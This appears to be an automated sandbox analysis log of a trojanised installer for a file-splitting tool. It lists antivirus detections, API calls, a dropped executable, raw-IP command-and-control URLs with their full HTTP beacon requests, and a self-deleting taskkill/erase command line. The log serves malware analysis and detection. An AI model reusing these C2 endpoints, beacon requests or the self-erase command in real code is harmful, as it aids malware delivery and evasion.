Source: 0.3.file.exe.24e15a0.2.unpack | Avira: Label: TR/Patched.Ren.Gen |
Source: 0.0.file.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen2 |
Source: 1.0.file.tmp.4cc934.1.unpack | Avira: Label: TR/Patched.Ren.Gen |
Source: 0.3.file.exe.23f54dc.5.unpack | Avira: Label: TR/Patched.Ren.Gen |
Source: 0.2.file.exe.400000.0.unpack | Avira: Label: TR/Crypt.XPACK.Gen2 |
Source: 2.2.HitFiles134.exe.10000000.5.unpack | Avira: Label: TR/Crypt.XPACK.Gen8 |
Source: 1.2.file.tmp.4cc934.1.unpack | Avira: Label: TR/Patched.Ren.Gen |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0045C298 GetProcAddress,GetProcAddress,GetProcAddress,ISCryptGetVersion, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0045C34C ArcFourCrypt, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0045C364 ArcFourCrypt, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00403770 CryptAcquireContextW,CryptCreateHash,_mbstowcs,CryptHashData,GetLastError,CryptDeriveKey,GetLastError,CryptReleaseContext,CryptDecrypt,CryptDestroyKey,___std_exception_copy, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004738D8 FindFirstFileA,FindNextFileA,FindClose, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00451D34 FindFirstFileA,GetLastError, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004960EC FindFirstFileA,SetFileAttributesA,FindNextFileA,FindClose, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00462DD8 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00463254 SetErrorMode,FindFirstFileA,FindNextFileA,FindClose,SetErrorMode, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0046184C FindFirstFileA,FindNextFileA,FindClose, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00423E2D FindFirstFileExW, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_1000959D FindFirstFileExW, |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\Local\Temp\is-OVJ5O.tmp\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\Local\Temp\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\Local\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\ |
Source: unknown | TCP traffic detected without corresponding DNS query: 45.139.105.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 45.139.105.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 45.139.105.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 45.139.105.171 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: unknown | TCP traffic detected without corresponding DNS query: 107.182.129.235 |
Source: HitFiles134.exe, 00000002.00000002.331582151.00000000017BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.182.129.235/storage/extension.php |
Source: HitFiles134.exe, 00000002.00000002.331582151.00000000017BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://107.182.129.235/storage/ping.php |
Source: HitFiles134.exe, 00000002.00000002.331582151.00000000017BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://171.22.30.106/library.php. |
Source: HitFiles134.exe, 00000002.00000002.331582151.00000000017BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://171.22.30.106/library.php4 |
Source: HitFiles134.exe, 00000002.00000002.331582151.00000000017BC000.00000004.00000020.00020000.00000000.sdmp, HitFiles134.exe, 00000002.00000002.331816078.00000000017F0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://45.139.105.171/itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte |
Source: file.tmp, 00000001.00000002.333569114.000000000018F000.00000004.00000010.00020000.00000000.sdmp, file.tmp, 00000001.00000002.334374587.0000000004620000.00000004.00001000.00020000.00000000.sdmp, is-ULQSL.tmp.1.dr, is-P2AUO.tmp.1.dr | String found in binary or memory: http://rus.altarsoft.com/split_files.shtml |
Source: file.tmp, 00000001.00000002.333569114.000000000018F000.00000004.00000010.00020000.00000000.sdmp, file.tmp, 00000001.00000002.334374587.0000000004620000.00000004.00001000.00020000.00000000.sdmp, is-7S1TU.tmp.1.dr, is-A3R8N.tmp.1.dr, is-UUBG5.tmp.1.dr, is-NN8RP.tmp.1.dr, is-7O8CS.tmp.1.dr, is-QV8JO.tmp.1.dr, is-JOJ80.tmp.1.dr, is-L1N1D.tmp.1.dr, is-BVH9M.tmp.1.dr, is-3NI9T.tmp.1.dr | String found in binary or memory: http://www.altarsoft.com/split_files.shtml |
Source: file.tmp, file.tmp, 00000001.00000002.333746784.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-S7F6P.tmp.1.dr | String found in binary or memory: http://www.innosetup.com/ |
Source: file.exe, 00000000.00000003.248037528.0000000002420000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.248226312.0000000002338000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000002.333746784.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-S7F6P.tmp.1.dr | String found in binary or memory: http://www.remobjects.com/ps |
Source: file.exe, 00000000.00000003.248037528.0000000002420000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.248226312.0000000002338000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.333746784.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-S7F6P.tmp.1.dr | String found in binary or memory: http://www.remobjects.com/psU |
Source: global traffic | HTTP traffic detected: GET /itsnotmalware/count.php?sub=NOSUB&stream=mixtwo&substream=mixinte HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 45.139.105.171Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /storage/ping.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 0Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /storage/extension.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 1Host: 107.182.129.235Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: global traffic | HTTP traffic detected: GET /library.php HTTP/1.1Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1Accept-Language: ru-RU,ru;q=0.9,en;q=0.8Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0User-Agent: 2Host: 171.22.30.106Connection: Keep-AliveCache-Control: no-cache |
Source: Yara match | File source: 2.2.HitFiles134.exe.32d0000.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.2.HitFiles134.exe.400000.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.2.HitFiles134.exe.32d0000.3.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.2.HitFiles134.exe.400000.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000002.00000002.332146458.0000000003330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000002.330440301.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000002.332003406.00000000032D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004093A8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0045476C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040836C |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00466480 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0047E9B0 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0046F05C |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0043D2FC |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0044401C |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0045E1DC |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0045A284 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004684F8 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00444714 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00434874 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_004849D0 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00430AB4 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00444B20 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00450C90 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00485904 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00443A74 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00404490 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_004096F0 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_004056A0 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00406800 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00406AA0 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00404D40 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00405F40 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00402F20 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_004150D3 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00415305 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_004223A9 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00419510 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00404840 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00426850 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00410A50 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_0042AB9A |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00421C88 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_0042ACBA |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00447D2D |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00428D39 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00404F20 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_1000F670 |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_1000EC61 |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 00405964 appears 99 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 00406A2C appears 39 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 00403400 appears 52 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 00452618 appears 82 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 00445650 appears 42 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 0040785C appears 37 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 00408B74 appears 45 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 00403494 appears 77 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 004568CC appears 82 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 00445380 appears 44 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 00456AD8 appears 59 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 00403684 appears 163 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: String function: 00433A88 appears 32 times |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: String function: 10003C50 appears 34 times |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: String function: 0040F9E0 appears 54 times |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0042F0EC NtdllDefWindowProc_A, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00423AF4 NtdllDefWindowProc_A, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0045614C PostMessageA,PostMessageA,SetForegroundWindow,NtdllDefWindowProc_A, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00412548 NtdllDefWindowProc_A, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_00476F38 NtdllDefWindowProc_A, |
Source: file.exe | Static PE information: Resource name: RT_VERSION type: COM executable for DOS |
Source: file.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows |
Source: file.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows |
Source: file.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows |
Source: file.tmp.0.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows |
Source: file.tmp.0.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped |
Source: is-S7F6P.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows |
Source: is-S7F6P.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) Intel Itanium, for MS Windows |
Source: is-S7F6P.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows |
Source: is-S7F6P.tmp.1.dr | Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows |
Source: is-S7F6P.tmp.1.dr | Static PE information: Resource name: RT_VERSION type: 370 sysV pure executable not stripped |
Source: HitFiles134.exe.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_SYSHEAP, IMAGE_SCN_MEM_PRELOAD, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: _RegDLL.tmp.1.dr | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
Source: unknown | Process created: C:\Users\user\Desktop\file.exe C:\Users\user\Desktop\file.exe |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp "C:\Users\user~1\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp" /SL5="$702C6,1650404,162304,C:\Users\user\Desktop\file.exe" |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Process created: C:\Program Files (x86)\Split Files\HitFiles134.exe "C:\Program Files (x86)\Split Files\HitFiles134.exe" |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\3JCCsnPwg.exe |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "HitFiles134.exe" /f & erase "C:\Program Files (x86)\Split Files\HitFiles134.exe" & exit |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "HitFiles134.exe" /f |
Source: C:\Users\user\Desktop\file.exe | Process created: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp "C:\Users\user~1\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp" /SL5="$702C6,1650404,162304,C:\Users\user\Desktop\file.exe" |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Process created: C:\Program Files (x86)\Split Files\HitFiles134.exe "C:\Program Files (x86)\Split Files\HitFiles134.exe" |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Process created: C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\3JCCsnPwg.exe |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "HitFiles134.exe" /f & erase "C:\Program Files (x86)\Split Files\HitFiles134.exe" & exit |
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "HitFiles134.exe" /f |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004093A8 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0045476C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,ExitWindowsEx, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Command line argument: `a}{ |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Command line argument: MFE. |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Command line argument: ZK]Z |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Command line argument: ZK]Z |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406518 push 00406555h; ret |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00408064 push ecx; mov dword ptr [esp], eax |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004040B5 push eax; ret |
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404185 push 00404391h; ret |
